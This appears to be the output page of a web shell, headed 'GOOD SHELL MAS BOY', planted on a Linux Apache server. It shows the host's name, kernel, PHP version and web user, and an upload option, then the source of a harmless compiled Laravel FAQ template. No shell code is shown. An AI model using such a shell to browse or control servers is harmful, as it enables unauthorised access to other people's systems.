GOOD SHELL MAS BOY
Server: Apache/2.4.52 (Ubuntu)
System: Linux vmi1836763.contaboserver.net 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
User: www-data (33)
PHP: 8.4.10
Disabled: NONE
Upload Files
File: /var/www/html/storage/framework/views/5d6b36011bc9d59c1bbcb5f8d11196a6.php
 <div class="accordion" id="accordionExample">
     <!--[if BLOCK]><![endif]--><?php $__currentLoopData = $faqs; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $index => $faq): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
     <div class="accordion-item <?php echo e($index === 0 ? 'active' : ''); ?>">
         <h2 class="accordion-header" id="heading<?php echo e($index); ?>">
             <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse<?php echo e($index); ?>" aria-expanded="<?php echo e($index === 0 ? 'true' : 'false'); ?>" aria-controls="collapse<?php echo e($index); ?>">
                 <?php echo e($faq['question']); ?>

             </button>
         </h2>
         <div id="collapse<?php echo e($index); ?>" class="accordion-collapse collapse <?php echo e($index === 0 ? 'show' : ''); ?>" aria-labelledby="heading<?php echo e($index); ?>" data-parent="#accordionExample">
             <div class="accordion-body">
                 <?php echo e($faq['answer']); ?>

             </div>
         </div>
     </div>
     <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?><!--[if ENDBLOCK]><![endif]-->
 </div><?php /**PATH /var/www/html/resources/views/livewire/web/faq.blade.php ENDPATH**/ ?>